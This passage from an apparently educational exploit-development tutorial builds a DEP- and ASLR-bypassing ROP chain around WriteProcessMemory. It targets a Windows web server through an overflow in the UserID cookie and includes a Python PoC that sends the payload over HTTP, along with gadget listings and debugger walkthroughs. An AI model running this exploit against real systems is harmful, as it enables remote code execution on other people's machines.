0xffffefe0 (Value to be popped into ECX. This is the negative representation of the distance between the current value of EAX and ESP + 0x38.)
0x1001283e: sub eax, ecx ; ret  ;  (1 found)

Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded 0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX will contain NULL bytes - which will kill our exploit. Instead, we will use the negative representation of numbers and perform subtraction in order to get around this problem.
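The NULL byte problem and the subtraction trick can be reproduced outside of the debugger. The following is a minimal sketch, assuming 32-bit wraparound arithmetic; the helper names (neg32, has_null_byte, sub32) are hypothetical and exist only for this illustration.

```python
import struct

MASK32 = 0xFFFFFFFF

def neg32(value):
    """Return the 32-bit two's complement (negative representation) of value."""
    return (-value) & MASK32

def has_null_byte(dword):
    """True if the little-endian encoding of dword contains a 0x00 byte."""
    return b"\x00" in struct.pack("<L", dword)

def sub32(eax, ecx):
    """Model sub eax, ecx with 32-bit wraparound."""
    return (eax - ecx) & MASK32

eax = 0x0012E000                 # hypothetical starting value of EAX
negative = neg32(0x1024)         # what would be popped into ECX instead of 0x1024

print(has_null_byte(0x00001024))  # the direct value contains NULL bytes
print(has_null_byte(negative))    # the negative representation does not
print(hex(sub32(eax, negative)))  # subtracting the negative adds 0x1024
```

Subtracting the negative representation yields the same result as adding the positive value, without ever placing a 0x00 byte in the payload.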

After the aforementioned gadget of exchanging EBP and EAX, program execution hits the pop ecx gadget.

The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.

Program execution then transfers to the sub eax, ecx ROP gadget, which will place the difference into the EAX register.

This yields our desired result.

Note that 0xCCCCCCCC is denoted as a visual for where we hope our program execution resumes at after all of this craziness. Our goal is for when the last ret occurs, it returns into this DWORD.

The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do this for us.

0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave  ; ret  ;  (1 found)

This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur - which is meaningless because ECX and EAX already contain the same value - meaning this part of the gadget basically just serves as a “NOP” of sorts. ESP then gets raised by 0x24 bytes, which we can compensate for - so this isn’t an issue. pop ebx can be compensated for as well, but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution flow off.

leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.

mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.

We know that currently EAX contains our target address. We also can recall from earlier that EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes - it would set ESP to ESP + 0x24 (at the time of the instruction executing) because of the mov esp, ebp instruction - which sets ESP to whatever EBP is. Due to the add esp, 0x24 gadget that occurs before the leave instruction - this would actually end up setting ESP to ESP, which is what we want. The goal here is to restore ESP back to our controlled data, which consists of our ROP gadgets.

It is a bit of a mouthful and “mind bender” of sorts - so do not worry if it is hazy or confusing at the moment. Viewing this step by step in the debugger will help make sense of all of this.

Note, after each gadget - obviously the value of ESP changes. For completeness’ sake, until we hit the add esp, 0x24 gadget - we will refer to the “target” ESP + 0x38 address as ESP + 0x38 (even though the offset will technically shrink after each gadget is executed).

First, as mentioned above, we need to get the value in EAX into EBP to prepare for the leave instruction.

0x61c30547: add ebp, eax ; ret  ;  (1 found)

How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0, which doesn’t alter it in any way, and the result of the addition is placed into EBP - essentially “moving” the address into EBP.
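To make the interaction between add ebp, eax and leave ; ret more concrete, here is a small register and memory model in Python. It is a sketch under stated assumptions: the stack addresses and the 0x90909090 filler are hypothetical, and only the three instructions of interest are modelled.

```python
MASK32 = 0xFFFFFFFF

def add_ebp_eax(regs):
    """add ebp, eax"""
    regs["ebp"] = (regs["ebp"] + regs["eax"]) & MASK32

def leave(regs, mem):
    """leave = mov esp, ebp ; pop ebp"""
    regs["esp"] = regs["ebp"]
    regs["ebp"] = mem[regs["esp"]]
    regs["esp"] += 4

def ret(regs, mem):
    """ret = pop the next DWORD into EIP"""
    regs["eip"] = mem[regs["esp"]]
    regs["esp"] += 4

# Hypothetical stack address that EAX was prepared to hold.
target = 0x0012F038
mem = {
    target: 0x90909090,      # DWORD consumed by the pop ebp half of leave
    target + 4: 0xCCCCCCCC,  # DWORD that ret loads into EIP
}
regs = {"eax": target, "ebp": 0, "esp": 0x0012E000, "eip": 0}

add_ebp_eax(regs)  # EBP was 0, so EBP now equals EAX
leave(regs, mem)   # ESP is redirected to wherever EBP pointed
ret(regs, mem)

print(hex(regs["eip"]), hex(regs["esp"]))
```

Whatever ESP held before leave is irrelevant: the instruction discards it and continues from the address in EBP, which is why EBP has to be prepared first.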

Let’s step through all of this in WinDbg - to make things a bit more clear.

First, program execution reaches the add ebp, eax instruction.

EBP currently is set to 0 and EAX is set to ESP + 0x38

Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.

After EBP is prepared, program execution reaches the next ROP gadget.

After stepping through the mov ecx, eax gadget - ECX and EAX are now both set to ESP + 0x38.

Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as ECX (which is already equal to EAX) is placed into EAX.

Taking a look at the stack now, we can see our compensation for add esp, 0x24 and pop ebx in the padding that sits before 0xCCCCCCCC.

Program execution has also reached the add esp, 0x24 instruction.

Stepping through the instruction, ESP has been set to the same value held in EAX, ECX, and EBP.

Then, pop ebx clears the last bit of “padding” on the stack.

After all of this has occurred, the leave instruction is loaded up for execution.

leave ; ret is executed, and the execution of our ROP chain resumes its course - all while preserving ESP into ECX and EAX!

WriteProcessMemory() Parameters

Recall that we are dealing with the x86 architecture, meaning function calls go through __stdcall instead of __fastcall. This means that instead of placing our function arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on - we can just simply place our parameters on the stack, as such.

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)
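The layout above can be expressed as a small helper that packs a function slot, a return address, and the stack arguments in the order a __stdcall callee expects to find them. This is a sketch only: build_call_frame is a hypothetical helper name, and the values are the placeholders from the listing above.

```python
import struct

def build_call_frame(func_slot, return_address, *args):
    """Pack a function slot, a return address, and stack arguments as DWORDs."""
    dwords = (func_slot, return_address) + args
    return b"".join(struct.pack("<L", dword) for dword in dwords)

frame = build_call_frame(
    0x61c832e4,  # placeholder: IAT pointer, later turned into WriteProcessMemory
    0x61c72530,  # return address (code cave where the shellcode will live)
    0xFFFFFFFF,  # hProcess
    0x61c72530,  # lpBaseAddress
    0x11111111,  # lpBuffer placeholder
    0x22222222,  # nSize placeholder
    0x1004D740,  # lpNumberOfBytesWritten
)

print(len(frame), hex(len(frame)))
```

The frame is 7 DWORDs long, so anything that needs to step over it on the stack has to skip 0x1c bytes.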

Let’s talk about where these parameters come from.

To “bypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t) - we can leverage the Import Address Table (IAT).

Whenever a program calls a Windows API function - it does not do so directly. A special table, within the process space, known as the IAT essentially contains pointers to each needed API function.

The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.

As is seen in the image above, the IAT just contains pointers to Windows API functions. Meaning each of these entries points to a Windows API function.

We have “the base address” of each module (in reality, each module is just not compiled with ASLR) - so that is no problem. However, the value that each of these entries holds (which is the address of a Windows API function) will change upon reboot.

The way to get around this would be to load the address of one of these IAT entries into a register we control (such as ECX) and then perform a mov ecx, dword ptr [ecx] instruction - an arbitrary read.

This would extract whatever ECX points to (which is the address of a Windows API function) and place it into ECX. Even though Windows will randomize the addresses of the API functions, we can still leverage the fact that each IAT entry will always point to the same Windows API function (even if the address of that function changes) to make sure this is not a problem.

Although the IAT for this application doesn’t directly contain a function pointer to kernel32!WriteProcessMemory - it does contain pointers to other kernel32.dll functions, such as kernel32!WriteFileImplementation. We also know that the distance between each function within a DLL DOESN’T CHANGE. This means the distance between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always remain the same for the current patch level and OS version.

This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.
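The idea can be modelled in a few lines of Python. This is a sketch, not the exploit logic itself: the RVAs and the two kernel32.dll base addresses are made-up values, and in practice the distance between the two functions has to be measured in a debugger for the exact OS build being targeted.

```python
MASK32 = 0xFFFFFFFF

# Hypothetical RVAs inside kernel32.dll for one specific OS build.
WRITEFILE_RVA = 0x00011000
WRITEPROCESSMEMORY_RVA = 0x00034000
DELTA = WRITEPROCESSMEMORY_RVA - WRITEFILE_RVA  # constant for that build

IAT_ENTRY = 0x61c832e4  # static address of the IAT slot (module has no ASLR)

def resolve_wpm(mem):
    """Read the IAT slot (mov ecx, dword ptr [ecx]) and add the fixed distance."""
    write_file = mem[IAT_ENTRY]
    return (write_file + DELTA) & MASK32

for kernel32_base in (0x75000000, 0x76a40000):  # two hypothetical ASLR bases
    # The loader fills the IAT slot with the real function address at load time.
    mem = {IAT_ENTRY: kernel32_base + WRITEFILE_RVA}
    print(hex(resolve_wpm(mem)))
```

The address of the IAT slot never changes, only its contents do, so reading the slot at run time and applying the fixed distance gives the right answer for either base.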

crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)

The next “parameter” is not really even a parameter at all. Similarly to my last ROP post, this will be used as the address in which program execution will transfer to AFTER the call to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.

Why 0x61c72530 specifically?

sqlite3.dll is a module of the application - meaning it is a part of process memory. Since this DLL is required for the application to work, we can target it as a place to write our shellcode. With this method of ROP, we need to find an executable portion of memory within the application and its modules. Then, using the call to kernel32!WriteProcessMemory - we will write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in WinDbg, we can determine the .text section of the portable executable has execute permissions. Also recall that even without write permissions, we can still write our shellcode if we “proxy” the write through the API call.
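The permissions that !dh prints come from the Characteristics field of each section header. As a rough illustration, the flags can be decoded as follows. The flag constants are the ones defined by the PE format; the value 0x60000020 is an assumed, typical .text value and not one read from sqlite3.dll, and describe_section is a hypothetical helper.

```python
# Section characteristic flags defined by the PE format.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def describe_section(characteristics):
    """Return the names of the permission flags set in a section header."""
    flags = [
        ("code", IMAGE_SCN_CNT_CODE),
        ("execute", IMAGE_SCN_MEM_EXECUTE),
        ("read", IMAGE_SCN_MEM_READ),
        ("write", IMAGE_SCN_MEM_WRITE),
    ]
    return [name for name, bit in flags if characteristics & bit]

# Assumed example value for a .text section: code, executable, readable.
print(describe_section(0x60000020))
```

A section that reports execute but not write is exactly the case described above: it cannot be written to with an ordinary store, which is why the write is proxied through the API call.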

Viewing the .text section address - we can see that the address chosen is just an executable “code cave” that is not used by the program - meaning that if we overwrite this memory, the program shouldn’t care.

This means, after the function call is completed and our shellcode is written here - program execution will transfer to this address.

crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)

The handle parameter is quite easy to fill - we can even use a static value. According to Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically, it returns a “pseudo handle” to the current process. A pseudo handle, denoted by -1 or 0xFFFFFFFF, is a “special” constant that refers to a handle to the current process. This means, whenever a Windows API function requests a handle (generally in user mode), passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since we would like to write our shellcode to memory within the process space - passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we would like to write the memory to virtual memory within the current process space.
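That -1 and 0xFFFFFFFF are the same 32-bit value can be confirmed quickly. The snippet below is a small sketch using only the struct module; the variable names are chosen for this example.

```python
import struct

PSEUDO_HANDLE = -1  # value of the current-process pseudo handle

as_unsigned = PSEUDO_HANDLE & 0xFFFFFFFF            # same bits, read as unsigned
packed_signed = struct.pack("<l", PSEUDO_HANDLE)    # signed 32-bit encoding
packed_unsigned = struct.pack("<L", 0xFFFFFFFF)     # unsigned 32-bit encoding

print(hex(as_unsigned), packed_signed == packed_unsigned)
```

Both encodings produce four 0xFF bytes, so the parameter also happens to be free of NULL bytes.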

crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 

lpBaseAddress will be the address of our shellcode, as already outlined by the “return” parameter.

crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)

lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We will dynamically resolve this with ROP gadgets.

crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 

nSize will be the size of our shellcode.

crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Lastly, lpNumberOfBytesWritten will be any writable address.

Let’s ROP v2!

We will be using what some have dubbed the “pointer” method of ROP (when it comes to x86 at least), where we will place these parameter “placeholders” on the stack and then dynamically change what these parameters point to in order to make a successful function call. Here is the PoC we will be using.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP via "leave" - which will compensate for the ROP gadget which moves EAX into ECX)
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack)  - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

The above PoC places the parameters on the stack and also performs a “jump” over them with add esp, 0x1C. Let’s examine this in the debugger.

The following is the state of the stack - with the kernel32!WriteProcessMemory parameters outlined in red.

The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we can see the stack moves further down.

We can see that we have moved further into our buffer, where our future ROP gadgets will reside. The parameters for the function call are now “behind” where program execution is - meaning we will not inadvertently corrupt these parameters because they are not within the current execution flow.
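The hop over the parameters can be traced with a list standing in for the stack. This is a simplified sketch: NEXT_GADGET is a hypothetical marker for whatever gadget follows the parameters, and sp is an index into the list rather than a real address.

```python
DWORD = 4
ADD_ESP_1C = 0x10015eb4   # add esp, 0x1c ; ret
NEXT_GADGET = 0xCCCCCCCC  # hypothetical marker for the gadget after the parameters

params = [0x61c832e4, 0x61c72530, 0xFFFFFFFF, 0x61c72530,
          0x11111111, 0x22222222, 0x1004D740]
stack = [ADD_ESP_1C] + params + [NEXT_GADGET]

sp = 0
eip = stack[sp]       # previous ret transfers control to add esp, 0x1c ; ret
sp += 1
sp += 0x1c // DWORD   # add esp, 0x1c skips the 7 parameter DWORDs
eip = stack[sp]       # ret picks up the first DWORD after the parameters
sp += 1

print(hex(eip))
```

None of the seven parameter slots is ever loaded into EIP, which is the property the jump is there to guarantee.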

Now that this is out of the way - we can “officially” begin our ROP chain to obtain code execution.

lpBuffer

The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else. Since we have control of the stack, we will just preemptively place our shellcode there. This is where the headache of storing an address near the stack in EAX and ECX will come into play.

As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.

The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.

Let’s say we get the parameter placeholder’s location (i.e. the virtual memory address, not the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be reading the value 0x2826930. However, if we read the value of dword ptr [ecx] instead - we would be reading the actual value of 0x11111111.

The first part of the image above shows the value of the address itself. The second part of the image shows what happens when we “dereference” (using poi in WinDbg), or extract the value a memory address is pointing to. We can leverage this, by using an arbitrary write primitive. When we get the address of the lpBuffer parameter into ECX - we then will not overwrite ECX, but rather dword ptr [ecx] - which will force the address on the stack (which contains the parameter placeholder) to point to something other than 0x11111111.
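The difference between the value of ECX and the value ECX points to can be shown with a dictionary acting as memory. This is a sketch: 0x02826930 is the example address from the text above, while the shellcode address is a hypothetical value.

```python
# Hypothetical snapshot of stack memory: address -> DWORD stored there.
LPBUFFER_SLOT = 0x02826930       # stack address of the lpBuffer placeholder
memory = {LPBUFFER_SLOT: 0x11111111}

ecx = LPBUFFER_SLOT              # ECX holds the address of the placeholder

value_of_ecx = ecx               # reading ECX itself
value_at_ecx = memory[ecx]       # reading dword ptr [ecx] (poi(ecx) in WinDbg)

shellcode_address = 0x02826c00   # hypothetical stack address of the shellcode
memory[ecx] = shellcode_address  # write through the pointer; ECX is unchanged

print(hex(value_of_ecx), hex(value_at_ecx), hex(memory[LPBUFFER_SLOT]))
```

After the write, ECX still holds the same address, but the DWORD stored at that address is no longer 0x11111111.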

Remember - every time the process is terminated and restarted - the virtual memory on the stack changes. This is why we need to dynamically resolve this parameter, instead of hardcoding an address.

We will use the following ROP gadgets, in order to make ECX contain the stack address holding the lpBuffer parameter placeholder.

crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

Two things about the above ROP gadgets. First, the clc instruction.

clc is an assembly instruction that clears the “carry” flag (CF, a bit in the EFLAGS register). None of our ROP gadgets, now or later, depend on the state of this flag - so it is okay that this instruction resides in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are not using the EDX register for anything - so this instruction will not disrupt what we are trying to achieve.

Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10 hexadecimal) - even though the parameter placeholder for lpBuffer is located 0x18 bytes away (24 decimal bytes).

This is again a “preparatory” procedure for our future ROP gadgets. We need a gadget, similar to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the stack address of our shellcode and dword ptr [ecx] contains the stack address which is currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our shellcode.

However, no such gadget could easily be found in the process memory. The closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX by 0x10 instead of 0x18 - because the gadget writes to the address in ECX plus an offset of 0x8 (0x18 - 0x10 = 0x8).
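The offset arithmetic can be verified with a short model. It is a sketch with hypothetical addresses: PLACEHOLDER stands for the stack address of the lpBuffer slot and eax for the shellcode address that will be prepared in EAX.

```python
PLACEHOLDER = 0x02826930  # hypothetical stack address of the lpBuffer slot
memory = {PLACEHOLDER: 0x11111111}

ecx = PLACEHOLDER - 0x18  # ECX starts 0x18 bytes behind the placeholder
eax = 0x02826c00          # hypothetical shellcode address held in EAX

for _ in range(16):       # sixteen inc ecx gadgets
    ecx += 1

memory[ecx + 0x8] = eax   # mov dword ptr [ecx+0x8], eax

print(hex(PLACEHOLDER - ecx), hex(memory[PLACEHOLDER]))
```

Stopping 0x8 bytes short is what makes the built-in +0x8 displacement of the gadget land exactly on the placeholder.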

The key is now to give some padding between the space on the stack for our future ROP gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on the stack for remaining ROP gadgets. This will allow us to “simulate” the rest of our ROP gadgets and choose a place on the stack that our shellcode will go, and start performing these calculations now. Think of these 0x300 bytes as “ROP gadget placeholders”. If perhaps we would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we would move our shellcode down lower. We will “aim” for 0x300 bytes down the stack, and we will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following ROP gadgets can accomplish loading the location of our “shellcode” (future shellcode) into EAX.
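One way to keep the shellcode at a fixed distance while the chain is still being written is to pad the reserved region automatically. The helper below is a hypothetical sketch of that bookkeeping (pad_rop_region is not part of the PoC), assuming the region is filled with 0x90909090 DWORDs as described above.

```python
import struct

RESERVED = 0x300                           # space set aside for remaining ROP gadgets
NOP_DWORD = struct.pack("<L", 0x90909090)  # filler for the unused part of the region

def pad_rop_region(rop_bytes, reserved=RESERVED):
    """Pad the remaining ROP chain with NOP DWORDs up to the reserved size."""
    if len(rop_bytes) > reserved:
        raise ValueError("ROP chain needs more room; move the shellcode further down")
    if len(rop_bytes) % 4:
        raise ValueError("ROP chain must be a whole number of DWORDs")
    missing = (reserved - len(rop_bytes)) // 4
    return rop_bytes + NOP_DWORD * missing

# Two gadget addresses from this section, followed by filler up to 0x300 bytes.
region = pad_rop_region(struct.pack("<LL", 0x1001dacc, 0x10021bfb))
print(hex(len(region)))
```

With this kind of helper, adding or removing gadgets does not move the shellcode, so offsets calculated earlier stay valid as long as the chain fits in the reserved space.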

crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about 0x2bc bytes away from EAX (0xfffffd44 is the negative representation of 0x2bc)
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

The location where our shellcode will be (your location can be different, depending on how far down the stack you wish to place it) is 0x2bc bytes away from the value in EAX. To load the address of our shellcode into EAX, we need to increase it by 0x2bc bytes. Obviously, this is too much for just consecutive inc eax gadgets. Additionally, if we directly add to EAX - the NULL byte problem would kill our exploit. This is because a 32-bit register, like EAX, needs the value 0x000002bc to completely fill its contents. To address this, we can use negative numbers and subtraction to yield the same result!

The negative representation of 0x2bc (0xfffffd44) will be loaded into ESI. We will then need to also compensate for the add esp, 0x8 instruction. To do this, we will add 0x8 bytes of padding so no gadgets get “jumped over”. Then, we will subtract the value in ESI from EAX - and place the difference in EAX. This will result in the address of where our shellcode will go being placed into EAX. Additionally, we need to compensate for the two pop instructions in the second gadget.
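The padding in this routine is easy to get wrong, so it can help to replay the DWORDs in order. The following sketch walks the chain with an iterator standing in for ESP; the starting value of EAX and the NEXT marker are hypothetical. Note that 0xfffffd44 is the 32-bit negative representation of 0x2bc.

```python
MASK32 = 0xFFFFFFFF
PAD = 0x90909090
NEXT = 0xCCCCCCCC  # hypothetical marker for the gadget that follows

chain = [
    0x1001fce9,  # pop esi ; add esp, 0x8 ; ret
    0xfffffd44,  # value popped into ESI
    PAD, PAD,    # skipped by add esp, 0x8
    0x10022f45,  # sub eax, esi ; pop edi ; pop esi ; ret
    PAD, PAD,    # consumed by pop edi and pop esi
    NEXT,
]

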